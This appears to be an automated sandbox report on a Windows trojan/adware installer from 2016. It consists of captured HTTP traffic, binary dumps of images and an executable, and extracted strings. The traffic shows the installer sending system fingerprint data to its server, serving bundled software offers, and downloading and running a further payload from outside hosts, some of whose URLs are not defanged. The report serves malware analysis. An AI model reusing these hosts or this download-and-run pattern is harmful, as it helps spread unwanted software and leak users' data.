H>[email protected].%.o.(.zz.V..../r.a..Q....!5P 8..'...I .I...%.*..AB...#
Q.QPH....JP.E.q]$..4.08...4..XN...s..U...C.........'.....b'....:H....K
..&.-A&.{......B..L..P..R./.3p...........'.5..UU.F........=.Mv...98...
S):...|7... jG.j.c.{o...&.A.....W..4.]......q!m..tw..rx../..1..6).D.2#
c..zN.!....q..cz./......f;....]...........k....q.....[.(<..<.a .
<H..s...UHx!B./.$..A..hM.|[email protected]..>._...o.e...U.<<< skipped >>>

GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1 HTTP/1.1

Host: capital.go2cloud.org

Connection: close

Accept: */*

User-Agent: InstallCapital


HTTP/1.1 302 Found

Cache-Control: no-cache, no-store, must-revalidate

Content-Type: text/html; charset=iso-8859-1

Date: Thu, 12 May 2016 21:58:37 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Location: hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1

P3P: CP="NOI CUR OUR NOR INT"

Pragma: no-cache

Server: nginx/1.7.9

Set-Cookie: enc_aff_session_4=ENC02024-102524c8b7d471e3251121f5c3cd0e-1006-4-0-0-0-0-UA-0-3131-313435-343338353236-30-30-30-194.242.96.218-20160512175837-_-1D1F4F24103E253220292314513A1B00655F6F0B4F131541634A1F5117051454457459536E2E2C1807; expires=Sat, 11 Jun 2016 21:58:37 GMT; path=/;

Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Sun, 07 Apr 2019 08:38:37 GMT; path=/;

tracking_id: 102524c8b7d471e3251121f5c3cd0e

X-Robots-Tag: noindex, nofollow

Content-Length: 445

Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://up.freeo9.space/offer.php?affId=1006&trackingId=45486
395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&
;cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&a
mp;uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1">here<
/a>.</p>.</body></html>...<<< skipped >>>

POST /index.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.secularistsarakolet.site

Content-Length: 430

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=C8318CA6891F5119A9FD96EC19E98D71&Sysid1=C8318CA6891F5119A9FD96EC19E98D71&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=Setup__2140_il65.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=Setup__2140_il65&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFA3AA==&netfs=3&ts=1463090333&ver=1.1.5.26
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 12 May 2016 21:58:46 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive
1b79....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//
EN">.<html>.    <head>.        <meta http-equiv="con
tent-type" content="text/html; charset=UTF-8" /> .        <title
>DownloadManagerModern</title>...<script type="text/javasc
ript">...  var g_notCompatibleWithUpdaterComps = ['LootFindKP'];...
  var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDub
a',  'UCwebAccelerator', 'UltimateSecurityPackage' ,  'TotalSecurity',
 'TotalSecurityIN', 'TotalSecurityRU'];...</script> .        <
;base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.&l
t;link rel="stylesheet" type="text/css" href="hXXp://cdn2.downloadcres
t.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />        <
script type="text/javascript" src="hXXp://cdn1.downloadcrest.com/V35/a
mipb.js"></script>.        <script type="text/javascript"&
gt;.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png
";..var g_r_appname="installer";..var g_r_cmdline="\/S";..            
var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_
offer_list = '1';.            var g_finish_install_button = '1';.     
       var g_popup_install_all = '1';.            var g_eula = 'VGhlIG
Rvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVu
IGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2
NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMg
SW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3RoZX<<< skipped >>>

POST /finalize.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.secularistsarakolet.site

Content-Length: 334

Connection: Keep-Alive

Cache-Control: no-cache

_hdn=0&_ver=1.1.5.26&_p=1&_s=20&_cc=UA&_cid=2140&_psb=0&_cnt=8090dd4d0f36f257c0d595bbfe802c92&_instid=l65&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_DownloadManagerModern=0&r_NationZoom=1&r_JinshanDuba=3&r_SputnikSearch=2&r_YesSearches=1&DownloadManagerModern=3&NationZoom=1&JinshanDuba=1&SputnikSearch=1&YesSearches=4
HTTP/1.1 200 OK

Content-Type: text/xml

Date: Thu, 12 May 2016 21:58:48 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 4590

Connection: keep-alive
....<Array><page><f>1</f><fb>9</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps>DownloadManagerModern</com
ps><short_name>DownloadManagerModern</short_name><mu
st_show>0</must_show><bdy>CjxkaXYgaWQ9ImFtaV9kX21hbmFnZ
XJfYm9keSI Cgk8ZGl2IGlkPSJhbWlfbGVmdF9pbWFnZSI CQoJCTxpbWcgaWQ9ImFtaV9
pbWFnZXVybCIgc3JjPSJodHRwOi8vcGUtc2l4aS5jb20vaW1nL2ljb25faW5zdGFsbGVyL
nBuZyIgLz4KCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5rcyI CQoJCQk8YSBocmVmPSJodHR
wOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9wcml2YWN5Lmh0bWwgIiB0YXJnZXQ9Il9ibGFua
yIgc3R5bGU9ImNvbG9yOiB3aGl0ZSI UHJpdmFjeSBQb2xpY3k8L2E PGJyIC8 CgkJCTx
hIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL2luZGV4Lmh0bWwiIHRhcmdld
D0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5IZWxwPC9hPjxiciAvPgoJCQk8YSB
ocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9jb250YWN0LXVzLmh0bWwiIHRhc
mdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5Db250YWN0IHVzPC9hPgoJCTw
vZGl2PgoJPC9kaXY Cgk8ZGl2IGlkPSJhbWlfYm9keV90ZXh0Ij4KCQk8ZGl2IGlkPSJhb
WlfZGVjX2RpdiI CgkJCTxzcGFuIGlkPSJhbWlfZGVjX3RpdGxlIj5TZXR1cCA8Yj5pbnN
0YWxsZXI8L2I PC9zcGFuPgkJCgkJCTxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlRvIGNvb
nRpbnVlIGluc3RhbGxpbmcgeW91ciBhcHBsaWNhdGlvbiwgY2xpY2sgb24gdGhlIE5leHQ
gYnV0dG9uLjwvc3Bhbj4KCQk8L2Rpdj4KCQkJCQoJCTxkaXYgaWQ9ImRfYW1pX0Rvd25sb
2FkTWFuYWdlck1vZGVybiIgc3R5bGU9ImhlaWdodDogMTMwcHgiPiAKCQk8YnIgLz4KCQk
JPGRpdiBkYXRhLWFkanVzdC1oZWlnaHQ9IjAiIGlkPSJtaWRkbGUiIHN0eWxlPSJ3aWR0a
DogMTAwJTsgcGFkZGluZzogMHB4OyBoZWlnaHQ6IDExMHB4OyBtYXJnaW4tdG9wOiA<<< skipped >>>

GET /Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.secularistsarakolet.site

Connection: Keep-Alive


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/png

Date: Thu, 12 May 2016 21:58:48 GMT

ETag: "24c41-7262-5328b8d5eeccc"

Last-Modified: Wed, 11 May 2016 06:57:17 GMT

Server: Apache/2.2.15 (Red Hat)

Content-Length: 29282

Connection: keep-alive
.PNG........IHDR.......s.....`..1....pHYs...............9.iTXtXML:com.
adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&
gt;.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5
-c021 79.155772, 2014/01/13-19:44:00        ">.   <rdf:RDF xmlns
:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">.      <rdf:D
escription rdf:about="".            xmlns:xmp="hXXp://ns.adobe.com/xap
/1.0/".            xmlns:dc="hXXp://purl.org/dc/elements/1.1/".       
     xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/".            
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/".            xmlns:stEvt=
"hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#".            xmlns:t
iff="hXXp://ns.adobe.com/tiff/1.0/".            xmlns:exif="hXXp://ns.
adobe.com/exif/1.0/">.         <xmp:CreatorTool>Adobe Photosh
op CC 2014 (Windows)</xmp:CreatorTool>.         <xmp:CreateDa
te>2016-03-16T16:09:11 02:00</xmp:CreateDate>.         <xm
p:ModifyDate>2016-03-16T16:23:05 02:00</xmp:ModifyDate>.     
    <xmp:MetadataDate>2016-03-16T16:23:05 02:00</xmp:Metadata
Date>.         <dc:format>image/png</dc:format>.       
  <photoshop:ColorMode>3</photoshop:ColorMode>.         &l
t;xmpMM:InstanceID>xmp.iid:36122a74-ac0f-5d40-8bf0-cb214281bd07<
/xmpMM:InstanceID>.         <xmpMM:DocumentID>adobe:docid:pho
toshop:1f386400-eb82-11e5-9c68-b3c1a0aff854</xmpMM:DocumentID>. 
        <xmpMM:OriginalDocumentID>xmp.did:ff769801-1319-ee4c<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2881

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:54 GMT

Content-Disposition: attachment; filename="cancel1.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT

ETag: "d9f00c86bfa3e08e905128b131229fac"

Accept-Ranges: bytes

Server: AmazonS3

Age: 23503

X-Cache: Hit from cloudfront

Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: GwTgHFdoISZkzBjhmS03rIHfHoS0eB17BdfxNcYAUGhPfPV-QSjtRg==
[email protected]*.-<.AC.K=.F>.H'. ;.B,./=.E)./)[email protected]=.D=.D?.GC.M
>.DC.IC.K'.,@.H>.F:.A*./D.LC.M?.HB.L=.G;.A9.@:.C .-;.CuuuB.K(.)&
gt;.G)..<.C). @.I>.E...>.G,. ). &. <.E*.&%.*6.C-.3-.33.7).
1&.)www(.-*. .../.54.?-.4=.B...!.().0...-.7...G.I..9-.35.7?.F'.0A.O-..
,.5<.B>.J ..D.I5.:..5=.GE.K/.0-.-/.2?.=,.7*. ;.B/.4 .'C.I..79.B&
.2 .,<.>".*-.0?.C-.-8.>-.&'.12.4:.AC.B1.7-.4..$'. 3.8Q.\<.
A<.G4.9 .05.<C.F6.;;[email protected]".%;.B>.Q*.-0.5&.<9.?'.-#.) .6:.A
 ./..31.57.>4.96.>0.76.<&.)2.78.?-.2-.3ppp...................
......................................................................
......................................................................
......................................................................
......................................................................
.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTcz
kc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP C
ore 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF x
mlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Des
cription rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:x
mpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.co
m/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Wi
ndows)" xmpMM:InstanceID="xmp.iid:5653313B52CD11E48302D8AFAF09E831" xm
pMM:DocumentID="xmp.did:5653313C52CD11E48302D8AFAF09E831"> <xmpM
M:DerivedFrom stRef:instanceID="xmp.iid:5653313952CD11E48302D8AFAF<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 1293

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:55 GMT

Content-Disposition: attachment; filename="decline.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "137a96f0655570ffdf65ae14dad52404"

Accept-Ranges: bytes

Server: AmazonS3

Age: 33966

X-Cache: Hit from cloudfront

Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: KuEvsOr3zBFpfWbfx-6VzBKR_uzo9NBxRIjFUr0s1IAudC0z46Sm4Q==
GIF89ae...............................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................!.....t.,....e........n
s.............n..mB.............FBm.s.C.............AB.DE.............
DDI.GGF.............G.I.........(.....HJ.LML..........%....8...z.J.\..
a.%N.5qB......8...F......H..F...$)..e.&P.A.I....37>......Ax..JT.N%D
..\....)..H.J..U...H..u...[.... ..&/H.{!%.V.m...X0...)Se.......W.P!D.J
.... ^[email protected]..(.........B.E....4.<Z4..-2..r....7L.....m*W.Y........
..Nc...<.x..a.....Do..........;........{......_.>.. ..3(p....W._
9p........{.........z... {[[email protected].!. f.".%j..
.#bh#._....[....@.)[email protected]..[[email protected].`.....|...h..
..^[email protected]..`...S.........o....z....7......9.!b.!...Vji. .... ....`&l
t;A'..f...T....=......:....0A.[$0@.>......{....a...&.....8@........
a...&`...6.l.bP0....;n._. [email protected]......,....k......!h4
....G....Wl.j..g....w.q.g.2..$.l..(....,....0..s.4..r......<....6.-
t.?.m4.l.<G.o....PG-..TWM..M[...P....X...$d.m..g..@ .;....
<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2157

Connection: keep-alive

Date: Sat, 12 Dec 2015 03:13:59 GMT

Content-Disposition: attachment; filename="next.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"

Accept-Ranges: bytes

Server: AmazonS3

Age: 21980

X-Cache: Hit from cloudfront

Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: _pf7A1s5gUmMDTPqgxT_w007CC28IttnXMmir4pleetmsCZdbVeFng==
[email protected]>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-
)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43
.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.
C<[email protected]>[email protected]?.H>[email protected].\..$..# .%!.&#.)&..%. 
".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,
.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<
;4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B
8.><.B<.C;.B;.@[email protected]>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D
.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~..........
..................................$.('. %.)4.9).,).-*.. .-).  .. .-*.-
-.10.41.5/.22.44.86.:C.HG.IH.L_.b.....................................
........'.(*.*(.)-../.0-.->.>C.E........................,.  .&..
................uuu...!.......,....e..........'......*\.........'.....
f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U
.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL.
.......2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<....
.G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h.....
.>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....&l
t;........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p
.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...
b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."
....7.Xc...|.K(#(..................nD.D ....8.(aK>.............<<< skipped >>>

GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cdn2.downloadcrest.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 2157

Connection: keep-alive

Date: Sat, 12 Mar 2016 07:10:57 GMT

Content-Disposition: attachment; filename="finish.gif"

Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT

ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"

Accept-Ranges: bytes

Server: AmazonS3

Age: 21979

X-Cache: Hit from cloudfront

Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: DAYyOWr_G-eK7FsfLGsyvCBPLTI84olBSQY9JY4CB0kMa7bSXwlBUg==
[email protected]>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-
)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43
.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.
C<[email protected]>[email protected]?.H>[email protected].\..$..# .%!.&#.)&..%. 
".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,
.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<
;4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B
8.><.B<.C;.B;.@[email protected]>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D
.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~..........
..................................$.('. %.)4.9).,).-*.. .-).  .. .-*.-
-.10.41.5/.22.44.86.:C.HG.IH.L_.b.....................................
........'.(*.*(.)-../.0-.->.>C.E........................,.  .&..
................uuu...!.......,....e..........'......*\.........'.....
f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U
.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL.
.......2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<....
.G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h.....
.>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....&l
t;........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p
.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...
b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."
....7.Xc...|.K(#(..................nD.D ....8.(aK>.............<<< skipped >>>

GET /?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0

Host: get.wenter3.space

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 350208

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Content-Transfer-Encoding: Binary

Content-disposition: attachment; filename="cpSetup.exe"

Date: Thu, 12 May 2016 21:58:13 GMT

X-Cache: Miss from cloudfront

Via: 1.1 b4ee4db849dcb5fce83f0bc3d6a9d57f.cloudfront.net (CloudFront)

X-Amz-Cf-Id: xeMckmYpslwK8ecETGD0QgaHiG7WYlLxCn0xbPK12tbiuJInRXcPeQ==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........g..}4..}4
..}4...4..}449.4..}4...4..}4...49.}4\X.4..}4..|4..}449.4..}4...4..}4..
.4..}449.4..}4Rich..}4........................PE..L....D3W............
.................l............@..................................X....
@.................................X...P....0...Q......................
.5...........................W.......W..@.............................
...............text............................... ..`.rdata..........
....................@[email protected][email protected]..
....... [email protected]..................
@[email protected]..."[email protected]..........................
......................................................................
......................................................................
......................................................................
.............................................;E.....E........ E.....E.
........I.....E.......h..C...Q..Y.....h..C...Q..Y.....h..C...Q..Y.....
..D.....E.........D.....E........{I.....E.........D.....E.........D...
..E........KI.....E........{D.....E........kD.....E.........I.....E...
......I.....E.........H.....E.........H.....E........ .E...u......$.E.
XRD.h..C.. .E...P.........E.$.E...............U..............D.3...$..
..h..C..kP......([email protected]...$Pj.....C..,.E.....$....3.....E..
.E...H....]........0.E...u.....0.E.................8.E...u.....8.E

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1764:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\NSISdl.dll

E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp

E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\NSISdl.dll

.reloc

WS2_32.dll

NSISdl.dll

invalid URL

Host: %s

GET %s HTTP/1.0

User-Agent: NSISDL/1.2 (Mozilla)

http=

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Unable to open %s

%skB (%d%%) of %skB at %u.ukB/s

(%u hours remaining)

(%u minutes remaining)

(%u seconds remaining)

Downloading %s

.vN {

({,{<{*;

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\cpSetup.exe

Setup__2140_il65.exe

SETUP_~1.EXE

.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ii_start.txt

ersion=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

up__2140_il65.exe

ps.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

c:\%original file name%.exe

%original file name%.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp

hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png

hXXp://pe-ma3i.info/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

Setup__2140_il65.exe_1408:

.text

`.rdata

@.data

.rsrc

@.reloc

FTPQ

j.Yf;

_tcPVj@

.PjRW

1.2.8

inflate 1.2.8 Copyright 1995-2013 Mark Adler

GetProcessWindowStation

operator

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

115 115 15 26 124 30 115 85

113 127 13 27 75 23 88 101 6

112 82 42 76 58 85 83 122 15

112 95 37

112 115 23 59 75

112 115 23 47 97 3 82 122

